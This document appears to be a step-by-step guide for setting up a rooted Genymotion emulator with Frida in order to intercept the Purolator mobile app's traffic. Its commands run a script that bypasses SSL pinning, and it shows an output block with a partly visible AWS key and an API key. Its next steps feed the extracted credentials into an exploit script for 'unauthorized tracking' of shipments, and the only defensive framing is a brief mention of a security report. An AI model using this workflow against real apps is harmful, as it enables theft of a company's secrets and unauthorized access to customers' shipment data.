# Genymotion + Frida Setup Guide (Free Version)

## 📋 Overview

Complete setup for intercepting Purolator app traffic using Genymotion emulator + Frida.

---

## 🎯 Step 1: Install Genymotion Desktop (Free)

### Download & Install

1. **Go to Genymotion website:**

   - Visit: https://www.genymotion.com/download/
   - Click "Download Genymotion Desktop" (Free for personal use)

2. **Create free account:**

   - Click "Sign up"
   - Use personal email (free tier)
   - Verify email

3. **Download installer:**

   - Choose: **"Genymotion Desktop with VirtualBox"** (includes VirtualBox)
   - For Windows: `genymotion-3.x.x-vbox.exe`
   - Size: ~200MB

4. **Install:**

   ```powershell
   # Run the installer
   # Accept defaults, include VirtualBox
   ```

5. **Launch Genymotion:**
   - Open Genymotion Desktop
   - Sign in with your account

---

## 🎯 Step 2: Create Android Virtual Device

### Best Device for Testing

1. **Click "+" to add device**

2. **Choose device (RECOMMENDED):**

   - **Device:** Google Pixel 5 or Samsung Galaxy S10
   - **Android Version:** 11.0 (API 30) or 12.0 (API 31)
   - **Architecture:** x86_64 (important for performance)

   **Why this choice?**

   - Android 11/12 = Modern but stable
   - x86_64 = Fast on PC
   - Pixel/Samsung = Common, well-supported

3. **Download the device:**

   - Click "Install"
   - Wait for download (~500MB-1GB)

4. **Start the device:**
   - Click "Start"
   - Wait for Android to boot (1-2 minutes)

---

## 🎯 Step 3: Enable ADB Access

### Configure Device for ADB

1. **In Genymotion, device is now running**

2. **Open PowerShell and test ADB:**

   ```powershell
   # Check ADB is working
   adb devices
   ```

   **If ADB not found:**

   ```powershell
   # Install ADB via Chocolatey
   choco install adb

   # OR download Android SDK Platform Tools:
   # https://developer.android.com/studio/releases/platform-tools
   ```

3. **You should see:**

   ```
   List of devices attached
   192.168.56.101:5555    device
   ```

   ✅ ADB is working!

---

## 🎯 Step 4: Root the Emulator (Already Rooted!)

**Good news:** Genymotion devices come **pre-rooted** by default!

Verify root access:

```powershell
adb shell su -c "id"
```

Expected output:

```
uid=0(root) gid=0(root) groups=0(root)
```

✅ Root access confirmed!

---

## 🎯 Step 5: Install Google Play Services

The Purolator app likely needs Google Play Services.

### Option A: Use Genymotion's OpenGApps (EASIEST)

1. **In running emulator, click "Open GApps" button** (top toolbar)
2. Click "Install" when prompted
3. Wait for installation (~2 minutes)
4. Reboot device when asked
5. ✅ Google Play installed!

### Option B: Manual Installation (if Option A doesn't work)

1. **Download OpenGApps:**

   - Visit: https://opengapps.org/
   - Platform: **x86_64** (not ARM!)
   - Android: **11.0** (match your device)
   - Variant: **nano** (smallest)

2. **Flash the zip:**
   ```powershell
   # Drag and drop the .zip file into Genymotion window
   # Follow prompts to install
   ```

---

## 🎯 Step 6: Install Purolator App

### Method 1: Download APK

1. **Get the APK:**

   - Use APKPure: https://apkpure.com/purolator-mobile/com.purolator.mobileapp
   - Or extract from real device: `adb pull /data/app/...`

2. **Install via ADB:**
   ```powershell
   adb install "C:\path\to\purolator.apk"
   ```

### Method 2: Use Google Play (if installed)

1. Open Play Store in emulator
2. Search "Purolator"
3. Install normally

---

## 🎯 Step 7: Install Frida

### Get Python & Frida Tools

1. **Check Python:**

   ```powershell
   python --version
   # Should show Python 3.x
   ```

   If not installed:

   ```powershell
   # Install from python.org
   # OR via Chocolatey:
   choco install python
   ```

2. **Install Frida:**

   ```powershell
   pip install frida-tools
   ```

3. **Verify installation:**
   ```powershell
   frida --version
   # Should show version like 16.1.4
   ```

---

## 🎯 Step 8: Install Frida Server on Emulator

### Download and Install

1. **Check Android architecture:**

   ```powershell
   adb shell getprop ro.product.cpu.abi
   ```

   Output: `x86_64` (most likely)

2. **Download frida-server:**

   - Get your Frida version: `frida --version`
   - Visit: https://github.com/frida/frida/releases
   - Download: `frida-server-16.5.9-android-x86_64.xz` (match version!)

3. **Extract the file:**

   ```powershell
   # Extract .xz file (use 7-Zip if needed)
   # Rename to just: frida-server
   ```

4. **Push to device:**

   ```powershell
   # Push frida-server
   adb push frida-server /data/local/tmp/

   # Make executable
   adb shell "chmod 755 /data/local/tmp/frida-server"

   # Start frida-server
   adb shell "/data/local/tmp/frida-server &"
   ```

5. **Verify it's running:**

   ```powershell
   frida-ps -U
   ```

   You should see list of Android processes!

---

## 🎯 Step 9: Run the Interception Script

### Finally, the fun part!

1. **Navigate to your scripts folder:**

   ```powershell
   cd "C:\Users\Roose\Downloads\8c7481c52661c4933b707a14e6cd22ba-java"
   ```

2. **Start interception:**

   ```powershell
   frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause
   ```

3. **In the emulator:**

   - Open Purolator app
   - Go to "Track Shipment"
   - Enter: **520127751300**
   - Press "Track"

4. **Watch your PowerShell terminal!**
   - You'll see SSL bypass messages
   - Complete request/response capture
   - AWS credentials extracted!

---

## 🐛 Troubleshooting

### Problem: "Device not found"

```powershell
# Check ADB connection
adb devices

# If empty, restart ADB
adb kill-server
adb start-server
adb devices
```

### Problem: "Application not found"

```powershell
# Check package name
adb shell pm list packages | findstr purolator

# Should show: package:com.purolator.mobileapp
```

### Problem: "Failed to attach: connection closed"

```powershell
# Restart frida-server
adb shell "pkill frida-server"
adb shell "/data/local/tmp/frida-server &"

# Wait 2 seconds, then try again
frida-ps -U
```

### Problem: "SSL pinning still blocking"

Make sure you're using `complete_intercept.js`, not the other scripts!

### Problem: "App crashes on startup"

```powershell
# Try without spawning fresh:
# 1. Start app manually in emulator
# 2. Then attach:
frida -U com.purolator.mobileapp -l complete_intercept.js
```

### Problem: Frida server version mismatch

```powershell
# Check versions match
frida --version
# Should match frida-server version you downloaded
```

---

## 🎯 Quick Reference Commands

```powershell
# Check device connected
adb devices

# Install APK
adb install purolator.apk

# Start frida-server (run once per reboot)
adb shell "/data/local/tmp/frida-server &"

# List processes
frida-ps -U

# Run interception (main command!)
frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause

# View logs if needed
adb logcat | findstr -i purolator
```

---

## 📊 Expected Timeline

| Step                  | Time        | Status |
| --------------------- | ----------- | ------ |
| Install Genymotion    | 10 min      | ⏱️     |
| Create virtual device | 5 min       | ⏱️     |
| Setup ADB             | 2 min       | ⏱️     |
| Install Google Play   | 5 min       | ⏱️     |
| Install Purolator app | 2 min       | ⏱️     |
| Install Frida tools   | 5 min       | ⏱️     |
| Install frida-server  | 3 min       | ⏱️     |
| Run interception      | 1 min       | 🎯     |
| **Total**             | **~30 min** | ✅     |

---

## ✅ Success Checklist

Before running Frida script, make sure:

- [ ] Genymotion installed and device running
- [ ] `adb devices` shows connected device
- [ ] `adb shell su -c "id"` shows uid=0 (root)
- [ ] Purolator app installed and opens
- [ ] `pip list | findstr frida` shows frida-tools installed
- [ ] `frida-ps -U` shows Android processes
- [ ] frida-server is running in background

---

## 🎯 What You'll Get

After successful interception, you'll capture:

```
🔑 EXTRACTED CREDENTIALS:
═══════════════════════════════════════════════════════════════
✓ AWS Access Key ID: AKIA************
✓ API Key: okpCK3fFSk645Ev3
═══════════════════════════════════════════════════════════════
```

Plus complete request structure for your POC!

---

## 🚀 Next Steps After Capture

1. ✅ Save AWS Access Key from output
2. ✅ Extract AWS Secret Key from signature (or capture from logs)
3. ✅ Update `poc_tracking_exploit.py` with real credentials
4. ✅ Test full unauthorized tracking
5. ✅ Document for security report

---

## 💡 Pro Tips

1. **Take snapshot after setup:**

   - In Genymotion: Settings → Snapshots → Create
   - Quick restore if something breaks

2. **Keep frida-server running:**

   - Survives app restarts
   - Needs restart after emulator reboot

3. **Use with mitmproxy for full traffic:**

   ```powershell
   # Terminal 1: Start mitmproxy
   mitmproxy --mode transparent

   # Terminal 2: Run Frida
   frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause
   ```

4. **Save output to file:**
   ```powershell
   frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause > output.log 2>&1
   ```

---

## 📞 Need Help?

If you get stuck:

1. Check the error message in PowerShell
2. Verify each step in the checklist
3. Try the troubleshooting section
4. Restart from a clean snapshot

---

**Ready? Let's start with Step 1!** 🚀

Install Genymotion Desktop from: https://www.genymotion.com/download/